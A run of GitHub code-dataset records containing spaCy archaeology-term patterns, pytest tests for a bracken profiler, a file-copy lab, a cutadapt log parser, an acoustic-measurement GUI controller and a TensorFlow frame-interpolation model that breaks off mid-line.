},\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142211\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"twig\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142212\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"uranium\"},\r\n\t\t\t{\"LOWER\": \"series\"},\r\n\t\t\t{\"LOWER\": \"dating\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142102\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"waterlogged\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/148328\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"waterworn\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142214\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"wood\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142215\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"worked\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142216\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"x-radiography\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142217\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"x-ray\"},\r\n\t\t\t{\"LOWER\": \"diffraction\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142218\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"x-ray\"},\r\n\t\t\t{\"LOWER\": \"fluorescence\"},\r\n\t\t\t{\"LOWER\": \"spectrometry\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142217\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"xrd\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/142218\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"xrf\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/144522\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"zircon\"}\r\n\t\t] \r\n },\r\n\t{\r\n\t\t\"id\": \"http://purl.org/heritagedata/schemes/560/concepts/170616\",\r\n \"label\": \"ARCHSCIENCE\",\r\n\t\t\"pattern\": [\r\n\t\t\t{\"LOWER\": \"zooarchaeology\"}\r\n\t\t] \r\n }\r\n\r\n]","repo_name":"cbinding/rematch2","sub_path":"rematch2/spacypatterns/patterns_en_FISH_ARCHSCIENCE.py","file_name":"patterns_en_FISH_ARCHSCIENCE.py","file_ext":"py","file_size_in_byte":29423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"22127829679","text":"\"\"\" Tests \"\"\"\n\nimport os\nimport random\nimport re\nimport shutil\nimport string\nfrom subprocess import getstatusoutput\n\nPRG = './bracken_profiler.py'\nINPUT1 = 'tests/inputs/bracken_profiler/input_1.txt'\nTAX = 'tests/inputs/bracken_profiler/taxonomy.csv'\n\n\n# --------------------------------------------------\ndef test_exists():\n \"\"\" Program exists \"\"\"\n\n assert os.path.isfile(PRG)\n\n\n# --------------------------------------------------\ndef test_testing_environment():\n \"\"\" Test files are in place \"\"\"\n\n assert os.path.isfile(INPUT1)\n 
assert os.path.isfile(TAX)\n\n\n# --------------------------------------------------\ndef test_usage():\n \"\"\" Usage \"\"\"\n\n for flag in ['-h', '--help']:\n retval, out = getstatusoutput(f'{PRG} {flag}')\n assert retval == 0\n assert out.lower().startswith('usage')\n\n\n# --------------------------------------------------\ndef test_bad_file():\n \"\"\" Bad input file \"\"\"\n\n bad = random_string()\n\n retval, out = getstatusoutput(f'{PRG} -t {TAX} {bad}')\n assert retval != 0\n assert out.lower().startswith('usage:')\n assert re.search('No such file', out)\n assert re.search(bad, out)\n\n\n# --------------------------------------------------\ndef test_bad_taxonomy_file():\n \"\"\" Bad input file \"\"\"\n\n bad = random_string()\n\n retval, out = getstatusoutput(f'{PRG} -t {bad} {INPUT1}')\n assert retval != 0\n assert out.lower().startswith('usage:')\n assert re.search('No such file', out)\n assert re.search(bad, out)\n\n\n# --------------------------------------------------\ndef test_runs_okay():\n \"\"\" Run the tool \"\"\"\n\n out_dir = random_string()\n\n try:\n if os.path.isdir(out_dir):\n shutil.rmtree(out_dir)\n\n rv, out = getstatusoutput(\n f'{PRG} -np 1 -o {out_dir} -t {TAX} {INPUT1}')\n\n assert rv == 0\n glob_file = os.path.join(out_dir, 'input_1_files.txt')\n profile_file = os.path.join(out_dir, 'input_1_profile.txt')\n assert re.search(f'Done. Wrote 1 profile to {out_dir}', out)\n assert os.path.isdir(out_dir)\n assert os.path.isfile(glob_file)\n assert os.path.isfile(profile_file)\n header = ('filename,accession\\n')\n assert open(glob_file).readlines()[0] == header\n profile_lines = open(profile_file).read().count('\\n')\n glob_lines = open(glob_file).read().count('\\n')\n assert glob_lines == profile_lines + 1\n\n finally:\n if os.path.isdir(out_dir):\n shutil.rmtree(out_dir)\n\n\n# --------------------------------------------------\ndef random_string() -> str:\n \"\"\" Generate a random string \"\"\"\n\n return ''.join(random.choices(string.ascii_uppercase + string.digits, k=5))\n","repo_name":"hurwitzlab/phage_detection_benchmarks","sub_path":"src/simulate_metagenomes/tests/bracken_profiler_test.py","file_name":"bracken_profiler_test.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"36764649633","text":"#!/usr/bin/env python\n\nimport os\n\ndef listfiles():\n \"\"\"function to list absolute path of all files in current directory\"\"\"\n cwd = os.getcwd()\n files = os.listdir(cwd)\n for file in files:\n print(os.path.abspath(file))\n\n\ndef filecopy():\n \"\"\"function for doing a streaming binary file copy\"\"\"\n source = input('Please enter the name of the file to be copied:\\n')\n if not os.path.isfile(source):\n print('Sorry, source file does not exist.\\n')\n filecopy()\n return\n destfile = input('Please enter the name that you would like for the destination file:\\n')\n\n dest = open(destfile, 'bw+')\n with open(source, 'rb') as file:\n print('Copying file...', end='', flush=True)\n while True:\n buffer = file.read(64)\n print('.', end='', flush=True)\n if not buffer:\n print('')\n print('File finished copying!')\n break\n print('.', end='', flush=True)\n dest.write(buffer)\n\n\ndef main():\n \"\"\"main function for this lab\"\"\"\n print('Please make a selection:')\n print('1. List the files in the current directory')\n print('2. 
Use Brandon\\'s patent pending (just kidding) streaming file copy')\n choice = input('')\n if choice == '1':\n listfiles()\n elif choice == '2':\n filecopy()\n else:\n print('Sorry, ' + choice + ' is not a valid selection, please choose 1 or 2')\n main()\n return\n\nif __name__ == '__main__':\n main()","repo_name":"UWPCE-PythonCert/Py100-2017q1","sub_path":"bmarlow/Week 4/file_lab.py","file_name":"file_lab.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"7547916659","text":"#!/usr/bin/env python3\nimport os\n#import sys\n\n#ifile=\"/home/jan/playground/TERA-Seq_snakemake/data/samples/hsa.dRNASeq.HeLa.polyA.CIP.decap.REL5.long.1/log/cutadapt.log\"\n\ndef cutadapt_parse_lens(ifile, library, ofile):\n # Read ifile line by lin\n with open(ifile, 'r') as f:\n content = f.read()\n\n # Find the adapter trimming section in the output\n start_index = content.find('length\\t')\n end_index = len(content)\n\n # Extract the adapter trimming information\n adapter_info = content[start_index:end_index]\n\n # Split the adapter information into lines\n adapter_lines = adapter_info.split('\\n')\n\n # Extract the length and number of trimmed adapters for each adapter sequence\n with open(ofile, 'w') as out:\n out.write(\"library\" + \"\\t\" + adapter_lines[0] + \"\\n\")\n for line in adapter_lines:\n if line[:1].isdigit():\n length = line.split('\\t')[0]\n count = line.split('\\t')[1]\n expect = line.split('\\t')[2]\n max_err = line.split('\\t')[3]\n err_counts = line.split('\\t')[4]\n out.write('{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n'.format(library, length, count, expect, max_err, err_counts))\n\nusage = \"Usage: python3 \" + os.path.basename(__file__) + \" cutadapt.log samplename\"\n\nifile=snakemake.input[0]\nlibrary=snakemake.wildcards.sample\nofile=snakemake.output[0]\n\ncutadapt_parse_lens(ifile, library, ofile)\n","repo_name":"opplatek/TERA-Seq_snakemake","sub_path":"workflow/scripts/parse-cutadapt-lens.py","file_name":"parse-cutadapt-lens.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25616447644","text":"def read_matrix():\n rows = int(input())\n matrix = []\n for _ in range(rows):\n matrix.append([int(x) for x in input().split()])\n return matrix\n\ndef print_matrix(matrix):\n for row in matrix:\n print(*row)\n\nmatrix = read_matrix()\n\ncommand, *other = input().split()\n\nwhile command != \"END\":\n row, col, value = map(int, other)\n if not (0 <= row < len(matrix) and 0 <= col < len(matrix[row])):\n print(\"Invalid coordinates\")\n else:\n if command == \"Add\":\n matrix[row][col] += value\n elif command == \"Subtract\":\n matrix[row][col] -= value\n command, *other = input().split()\n\nprint_matrix(matrix)\n","repo_name":"marians1d/SoftUni","sub_path":"Python-Advanced/Multidimensional-Lists/Exercises2/Matrix-Modification/matrix_modification.py","file_name":"matrix_modification.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"9153585728","text":"from src.controller.pantalla_con_graficas_controller import PantallaConGraficasController\nfrom src.core.domain.medidor_acustico import MedidorAcustico\nfrom src.core.provider.action_provider import ActionProvider\nfrom src.core.provider.repository_provider import RepositoryProvider\nfrom src.core.provider.subject_provider import 
SubjectProvider\nfrom src.core.domain.mensaje import Mensaje\n\n\nclass VistaDetalladaController(PantallaConGraficasController):\n\n\n def __init__(self, view):\n super().__init__(view)\n self.master = \"VistaDetallada\"\n self.string_repository = RepositoryProvider.provide_string_repository()\n self.vista_detallada_subject = SubjectProvider.provide_vista_detallada_subject()\n self.vista_detallada_subject.subscribe(on_next=lambda mensaje: self.procesar(mensaje))\n self.pantalla_principal_subject = SubjectProvider.provide_pantalla_principal_subject()\n self.medicion_repository = RepositoryProvider.provide_medicion_repository()\n self.medidor_acustico = MedidorAcustico()\n self.transformar_a_db_action = ActionProvider.provide_transformar_a_escala_logaritmica_normalizada_action()\n self.calculos_por_tipo_de_banda = {\n 'OCTAVA': self.medidor_acustico.obtener_medicion_en_octava,\n 'TERCIO_OCTAVA': self.medidor_acustico.obtener_medicion_en_tercio_octava\n }\n\n def on_cerrar_ventana(self):\n mensaje_activar_boton = Mensaje(destinatario=\"VistaPrincipal\", mensaje=\"ActivarBotonVistaDetallada\")\n self.pantalla_principal_subject.on_next(mensaje_activar_boton)\n self.view.ocultar_vista()\n\n def on_calcular(self):\n self.activar_progressbar()\n self.bloquear_controles()\n ponderacion_A_activa = self.view.verificar_ponderacion_A()\n tab_activa = self.view.get_tab_activa()\n medicion = self.medicion_repository.get_medicion()\n f_central = tab_activa.get_frecuencia_central_banda_seleccionada()\n self.calculos_por_tipo_de_banda.get(tab_activa.get_tipo())(\n medicion, f_central, ponderacion_A=ponderacion_A_activa)\n\n def on_mostrar_instrucciones(self):\n self.desactivar_boton_instrucciones()\n from src.core.domain.coordinador_de_vistas import CoordinadorDeVistas\n CoordinadorDeVistas.mostrar_vista(\"VistaDetalladaInstrucciones\")\n\n def desactivar_boton_instrucciones(self):\n self.view.desactivar_boton_instrucciones()\n\n def activar_boton_instrucciones(self):\n self.view.activar_boton_instrucciones()\n\n def finalizar_calculo(self, paquete):\n self.unbindear_evento_root(\"Configure\")\n self.mostrar_medicion_en_vista(paquete)\n self.desactivar_progressbar()\n self.desbloquear_controles()\n\n def mostrar_medicion_en_vista(self, medicion):\n nivel_respuesta_impulsional = medicion.get_nivel_respuesta_impulsional()\n self.view.graficar(nivel_respuesta_impulsional, medicion.get_curva_decaimiento())\n self.view.mostrar_tiempos_de_reverberacion(\n medicion.get_edt().get_rt(), medicion.get_t20().get_rt(), medicion.get_t30().get_rt())\n self.view.mostrar_parametros_de_linealidad(\n medicion.get_edt(), medicion.get_t20(), medicion.get_t30(), medicion.get_curvatura())\n\n def mostrar_error_lundeby(self):\n self.view.mostrar_error(self.string_repository.get_mensaje_error_lundeby())\n self.desbloquear_controles()\n self.desactivar_progressbar()\n\n def get_medicion(self):\n return self.medicion_repository.get_medicion()\n\n def activar_progressbar(self):\n self.view.activar_progressbar()\n\n def desactivar_progressbar(self):\n self.view.desactivar_progressbar()\n","repo_name":"GabrielPenaU3F/TrabajoTesis","sub_path":"Python/medidor_acustico/src/controller/vista_detallada_controller.py","file_name":"vista_detallada_controller.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19083903689","text":"import tensorflow as tf\nimport numpy as np\nfrom conf_tab import config\nbatch_norm = 
config.TRAIN.batch_norm\nkernel_size = config.TRAIN.kernel_size\n# import src.flownet2.flownet2 as flownet2\n# batch_size = config.TRAIN.per_gpu_batch_size\n# from src.training_schedules import LONG_SCHEDULE\nfrom copy import deepcopy\n# from skimage.io import imread\n# from model_pwcnet import ModelPWCNet, _DEFAULT_PWCNET_TEST_OPTIONS\nfrom my_pwc_net import nn\n\ndef conv2d_padding_same(inputs, numfilter, kernel_size=3, trainable=True, activate=None):\n return tf.layers.conv2d(inputs, numfilter, kernel_size, padding='same', kernel_initializer=tf.variance_scaling_initializer(),\n trainable=trainable, activation=activate)\n\n\ndef batchnorm(inputs, training):\n return tf.layers.batch_normalization(inputs, training=training)\n\ndef maxpool2d_same(inputs, poolsize=2, stride=2):\n return tf.layers.max_pooling2d(inputs, pool_size=poolsize, strides=stride, padding='same')\n\n\ndef bilinear_interp(im, x, y, name):\n \"\"\"Perform bilinear sampling on im given x, y coordinates\n\n This function implements the differentiable sampling mechanism with\n bilinear kernel. Introduced in https://arxiv.org/abs/1506.02025, equation\n (5).\n\n x,y are tensors specfying normalized coorindates [-1,1] to sample from im.\n (-1,1) means (0,0) coordinate in im. (1,1) means the most bottom right pixel.\n Args:\n im: Tensor of size [batch_size, height, width, depth]\n x: Tensor of size [batch_size, height, width, 1]\n y: Tensor of size [batch_size, height, width, 1]\n name: String for the name for this opt.\n Returns:\n Tensor of size [batch_size, height, width, depth]\n \"\"\"\n with tf.variable_scope(name):\n x = tf.reshape(x, [-1])\n y = tf.reshape(y, [-1])\n\n # constants\n num_batch = tf.shape(im)[0]\n # _, height, width, channels = im.get_shape().as_list()\n height, width, channels = tf.shape(im)[1], tf.shape(im)[2], tf.shape(im)[3]\n # x = tf.to_float(x)\n # y = tf.to_float(y)\n\n # height_f = tf.cast(height, 'float32')\n # width_f = tf.cast(width, 'float32')\n zero = tf.constant(0, dtype=tf.int32)\n\n max_x = tf.cast(tf.shape(im)[2] - 1, 'int32')\n max_y = tf.cast(tf.shape(im)[1] - 1, 'int32')\n # x = (x + 1.0) * (width_f - 1.0) / 2.0\n # y = (y + 1.0) * (height_f - 1.0) / 2.0\n\n # Sampling\n x0 = tf.cast(tf.floor(x), 'int32')\n x1 = x0 + 1\n y0 = tf.cast(tf.floor(y), 'int32')\n y1 = y0 + 1\n\n x0 = tf.clip_by_value(x0, zero, max_x)\n x1 = tf.clip_by_value(x1, zero, max_x)\n y0 = tf.clip_by_value(y0, zero, max_y)\n y1 = tf.clip_by_value(y1, zero, max_y)\n\n dim2 = width\n dim1 = width * height\n\n # Create base index\n base = tf.range(num_batch) * dim1\n base = tf.reshape(base, [-1, 1])\n base = tf.tile(base, [1, height * width])\n base = tf.reshape(base, [-1])\n\n base_y0 = base + y0 * dim2\n base_y1 = base + y1 * dim2\n idx_a = base_y0 + x0\n idx_b = base_y1 + x0\n idx_c = base_y0 + x1\n idx_d = base_y1 + x1\n\n # Use indices to look up pixels\n im_flat = tf.reshape(im, tf.stack([-1, channels]))\n im_flat = tf.to_float(im_flat)\n pixel_a = tf.gather(im_flat, idx_a)\n pixel_b = tf.gather(im_flat, idx_b)\n pixel_c = tf.gather(im_flat, idx_c)\n pixel_d = tf.gather(im_flat, idx_d)\n\n # Interpolate the values\n x1_f = tf.to_float(x1)\n y1_f = tf.to_float(y1)\n\n wa = tf.expand_dims((x1_f - x) * (y1_f - y), 1)\n wb = tf.expand_dims((x1_f - x) * (1.0 - (y1_f - y)), 1)\n wc = tf.expand_dims((1.0 - (x1_f - x)) * (y1_f - y), 1)\n wd = tf.expand_dims((1.0 - (x1_f - x)) * (1.0 - (y1_f - y)), 1)\n\n output = tf.add_n([wa * pixel_a, wb * pixel_b, wc * pixel_c, wd * pixel_d])\n # output = tf.reshape(output, 
shape=tf.stack([num_batch, height, width, channels]))\n output = tf.reshape(output, shape=tf.shape(im))\n return output\n\n\ndef meshgrid(height, width):\n \"\"\"Tensorflow meshgrid function.\n \"\"\"\n with tf.variable_scope('meshgrid'):\n x_t = tf.matmul(\n tf.ones(shape=tf.stack([height, 1])),\n tf.transpose(\n tf.expand_dims(\n tf.linspace(-1.0, 1.0, width), 1), [1, 0]))\n y_t = tf.matmul(\n tf.expand_dims(\n tf.linspace(-1.0, 1.0, height), 1),\n tf.ones(shape=tf.stack([1, width])))\n x_t_flat = tf.reshape(x_t, (1, -1))\n y_t_flat = tf.reshape(y_t, (1, -1))\n\n grid_x = tf.reshape(x_t_flat, [1, height, width])\n grid_y = tf.reshape(y_t_flat, [1, height, width])\n return grid_x, grid_y\n\ndef res_block(inputs, training=True, trainable=True, reuse=False):\n # with tf.variable_scope('res_block', reuse=reuse):\n h = inputs\n with tf.variable_scope('batchnorm1', reuse=reuse):\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, kernel_size=3, trainable=trainable, activate=tf.nn.relu)\n with tf.variable_scope('batchnorm2', reuse=reuse):\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, kernel_size=3, trainable=trainable, activate=None)\n h = h + inputs\n h = tf.nn.relu(h)\n return h\n\ndef ctx_net(inputs, name, training=True, reuse=False, trainable=True):\n # with tf.variable_scope('context_net_{}'.format(name)):\n h = inputs\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, kernel_size=7, trainable=trainable, activate=tf.nn.relu)\n h1 = h\n h = res_block(h, training=training, trainable=trainable)\n h2 = h\n h = res_block(h, training=training, trainable=trainable)\n h = tf.concat([h, h1, h2], axis=-1)\n return h\n\ndef rect_net(inputs, training=True, reuse=False, trainable=True):\n with tf.variable_scope('rect_net'):\n h = inputs\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, kernel_size=3, trainable=trainable, activate=tf.nn.relu)\n for i in range(3):\n h = res_block(h, training=training, trainable=trainable)\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 3, kernel_size=3, trainable=trainable, activate=None)\n return h\n\ndef u_net(inputs, name, training=True, reuse=False, trainable=True, out_size=2):\n h = inputs\n filter_nums = [64, 128, 256, 256]\n # with tf.variable_scope('flow_net_{}'.format(name)):\n mid_feat = []\n for k, n_dim in enumerate(filter_nums):\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, n_dim, activate=tf.nn.relu, trainable=trainable)\n if k != len(filter_nums) - 1:\n mid_feat.append(h)\n h = maxpool2d_same(h)\n\n for n_dim, pre_f in zip(filter_nums[:-1][::-1], mid_feat[::-1]):\n h = batchnorm(h, training)\n shape_f = tf.shape(pre_f)\n h = tf.image.resize_bilinear(h, (shape_f[1], shape_f[2]))\n h = tf.concat([h, pre_f], axis=-1)\n h = conv2d_padding_same(h, n_dim, activate=tf.nn.relu, trainable=trainable)\n\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, out_size, kernel_size=3, activate=None, trainable=trainable)\n\n return h\n\ndef to_flow(inputs, name, training=True, reuse=False, trainable=True, out_size=2):\n h = inputs\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, 64, kernel_size=3, activate=tf.nn.relu, trainable=trainable)\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, out_size, kernel_size=3, activate=None, trainable=trainable)\n\n return h\n\n\ndef adaptive_warp(tgt_img, flow, kernel):\n '''\n :param tgt_img: shape = [b, h, w, 3]\n :param flow: shape = [b, h, w, 2]\n :param kernel: shape = [b, h, w, 25]\n :return 
src_img: shape = [b, h, w, 3]\n '''\n h, w, c = tf.shape(tgt_img)[1], tf.shape(tgt_img)[2], tf.shape(tgt_img)[3]\n '''\n kernel_size = kernel.shape[3]//2\n\n kernel_h = kernel[:,:,:,:kernel_size]\n kernel_v = kernel[:,:,:,kernel_size:]\n\n kernel_h = tf.tile(tf.expand_dims(kernel_h, -1), [1, 1, 1, 1, kernel_size])\n kernel_v = tf.tile(tf.expand_dims(kernel_v, -2), [1, 1, 1, kernel_size, 1])\n \n kernel_reshape = tf.reshape(tf.multiply(kernel_h, kernel_v), [-1, h, w, 1, kernel_size*kernel_size])\n '''\n kernel_reshape = tf.expand_dims(kernel, -2)\n warped_img = tf.contrib.image.dense_image_warp(image=tgt_img, flow=flow)\n input_x_padding = tf.pad(warped_img, [[0, 0], [kernel_size//2, kernel_size//2], [kernel_size//2, kernel_size//2], [0, 0]])\n\n src_img = None\n for i in range(kernel_size):\n for j in range(kernel_size):\n slice = tf.slice(input_x_padding, [0, i, j, 0], [-1, h, w, -1])\n if src_img == None:\n src_img = slice * kernel_reshape[:, :, :, :, i * kernel_size + j]\n else:\n src_img += slice * kernel_reshape[:, :, :, :, i * kernel_size + j]\n\n return src_img#, p_node\n\ndef downsampling(inputs, num_f, training=True, trainable=True):\n '''\n bn->relu->conv\n :param inputs:\n :param training:\n :param trainable:\n :return:\n '''\n h = inputs\n for i in range(2):\n # h = batchnorm(h, training=training)\n h = tf.nn.relu(h)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=None)\n if i==0:h = maxpool2d_same(h)\n return h\n\ndef upsampling(inputs, num_f, training=True, trainable=True):\n '''\n bn->relu->conv\n :param inputs:\n :param num_f:\n :param training:\n :param trainable:\n :return:\n '''\n h = inputs\n for i in range(2):\n # h = batchnorm(h, training=training)\n h = tf.nn.relu(h)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=None)\n if i==0: h = tf.image.resize_bilinear(h, size=[tf.shape(h)[1]*2, tf.shape(h)[2]*2])\n return h\n\ndef lateral(inputs, training=True, trainable=True):\n '''\n bn->relu->conv\n :return:\n '''\n h = inputs\n _, _, _, num_f = inputs.get_shape().as_list()\n for i in range(2):\n # h = batchnorm(h, training)\n h = tf.nn.relu(h)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=None)\n return h + inputs\n\ndef in_grid(inputs, num_f=32, training=True, trainable=True):\n h = inputs\n # h = batchnorm(h, training)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=tf.nn.relu)\n return h\n\ndef out_grid(inputs, num_f=3, training=True, trainable=True):\n h = inputs\n # h = batchnorm(h, training)\n h = conv2d_padding_same(h, numfilter=num_f, trainable=trainable, activate=None)\n return h\n\ndef gridnet(inputs, training=True, trainable=True):\n ch_sizes = [32, 64, 96]\n down_first_hs, down_second_hs, down_third_hs = [], [], []\n h = inputs\n '''\n downsample\n '''\n for i in range(3):\n if len(down_first_hs)==0:\n down_first_hs.append(in_grid(h, num_f=ch_sizes[0], training=training, trainable=trainable))\n else:\n down_first_hs.append(lateral(down_first_hs[-1], training=training, trainable=trainable))\n\n for i in range(3):\n tmp_h = downsampling(down_first_hs[i], num_f=ch_sizes[1], training=training, trainable=trainable)\n if len(down_second_hs): tmp_h += down_second_hs[-1]\n down_second_hs.append(tmp_h)\n\n for i in range(3):\n tmp_h = downsampling(down_second_hs[i], num_f=ch_sizes[2], training=training, trainable=trainable)\n if len(down_third_hs): tmp_h += down_third_hs[-1]\n down_third_hs.append(tmp_h)\n\n '''\n upsample\n '''\n for i in range(3, 6, 1):\n 
down_third_hs.append(lateral(down_third_hs[-1], training=training, trainable=trainable))\n\n for i in range(3, 6, 1):\n down_second_hs.append(lateral(upsampling(down_third_hs[i], num_f=ch_sizes[1], training=training, trainable=trainable) +\n down_second_hs[-1], training=training, trainable=trainable))\n\n for i in range(3, 6, 1):\n down_first_hs.append(lateral(upsampling(down_second_hs[i], num_f=ch_sizes[0], training=training, trainable=trainable) +\n down_first_hs[-1], training=training, trainable=trainable))\n\n return out_grid(down_first_hs[-1], num_f=3, training=training, trainable=trainable)\n\ndef synthesis_net(inputs, name='synthesis_net', training=True, trainable=True, out_size = 3, reuse=True):\n with tf.variable_scope(name, reuse=reuse):\n h = inputs\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, 128, kernel_size=7, trainable=trainable, activate=tf.nn.relu)\n\n h1 = batchnorm(h, training)\n h1 = conv2d_padding_same(h1, 128, trainable=trainable, activate=tf.nn.relu)\n h1 = batchnorm(h1, training)\n h1 = conv2d_padding_same(h1, 128, trainable=trainable, activate=None)\n h += h1\n h = tf.nn.relu(h)\n\n h2 = batchnorm(h, training)\n h2 = conv2d_padding_same(h2, 128, trainable=trainable, activate=tf.nn.relu)\n h2 = batchnorm(h2, training)\n h2 = conv2d_padding_same(h2, 128, trainable=trainable, activate=None)\n h += h2\n h = tf.nn.relu(h)\n\n h3 = batchnorm(h, training)\n h3 = conv2d_padding_same(h3, 128, trainable=trainable, activate=tf.nn.relu)\n h3 = batchnorm(h3, training)\n h3 = conv2d_padding_same(h3, 128, trainable=trainable, activate=None)\n h += h3\n h = tf.nn.relu(h)\n\n h = batchnorm(h, training)\n h = conv2d_padding_same(h, out_size, trainable=trainable, activate=None)\n return h\n\n\ndef pyr_synthesis_net(warped_img1_pyr, warped_ctx1_pyr, training=True, reuse=False, trainable=True):\n last_f = None\n for i, (warped_img1, warped_ctx1) in enumerate(\n zip(warped_img1_pyr, warped_ctx1_pyr)):\n h = tf.concat([warped_img1, warped_ctx1], axis=-1)\n with tf.variable_scope('res_block_{}'.format(i), reuse=reuse):\n h = batchnorm(h, training=training)\n h = conv2d_padding_same(h, 64, trainable=trainable, activate=tf.nn.relu)\n h = res_block(h, training=training, trainable=trainable, reuse=reuse)\n if last_f is not None: h += last_f\n last_f = tf.image.resize_bilinear(h, [tf.shape(h)[1] * 2, tf.shape(h)[2] * 2])\n h = to_flow(h, name=None, training=training, reuse=reuse, trainable=trainable, out_size=3)\n return h\n\ndef model_interpolation(first_img_t, end_img_t, ctx_net, training=True, reuse=False, trainable=True):\n '''\n Compute Flow\n '''\n x_tnsr1 = tf.stack([first_img_t, end_img_t], axis=1)\n flow_pred1, flow_pyr1 = nn(x_tnsr1, reuse=reuse)\n flow_pred1 = flow_pred1[:, :, :, ::-1]\n x_tnsr2 = tf.stack([end_img_t, first_img_t], axis=1)\n flow_pred2, flow_pyr2 = nn(x_tnsr2, reuse=True)\n flow_pred2 = flow_pred2[:, :, :, ::-1]\n\n with tf.variable_scope('interpolation_net', reuse=reuse):\n t = 0.5\n\n '''\n Compute Mask\n '''\n mask = u_net(tf.concat([first_img_t, end_img_t], axis=-1), name='mask', out_size=1, training=training, reuse=reuse, trainable=trainable)\n mask = (mask + 1.0) * 0.5\n # mask1 = mask[:,:,:,0:1]\n # mask2 = mask[:,:,:,1: ]\n\n '''\n Compute Context\n '''\n # ctx1 = ctx_net.conv1_2(first_img_t)\n # ctx2 = ctx_net.conv1_2(end_img_t)\n\n '''\n Compute Kernel\n '''\n kernels = u_net(tf.concat([first_img_t, end_img_t], axis=-1), name='kernel', training=training, reuse=reuse, trainable=trainable, out_size=kernel_size*kernel_size*2)\n kernel1 = 
